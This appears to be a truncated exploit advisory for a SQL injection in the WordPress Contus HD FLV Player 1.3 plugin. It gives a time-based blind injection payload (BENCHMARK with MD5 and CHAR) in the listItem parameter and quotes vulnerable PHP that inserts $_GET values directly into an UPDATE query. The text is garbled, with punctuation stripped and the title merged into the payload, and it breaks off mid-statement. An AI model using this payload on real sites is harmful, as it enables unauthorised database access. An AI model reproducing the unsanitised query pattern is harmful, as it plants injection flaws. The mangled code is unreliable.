WordPress Contus HD FLV Player 1.3 SQL Injection

Exploit Title: WordPress Contus HD FLV Player plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0&listItem=1 --------------- Vulnerable code --------------- $pid1 = $GET'playid'; foreach $GET'listItem' as $position = $item : mysqlquery"UPDATE $wpdb-prefix" . "hdflvmed2play SET sorder =...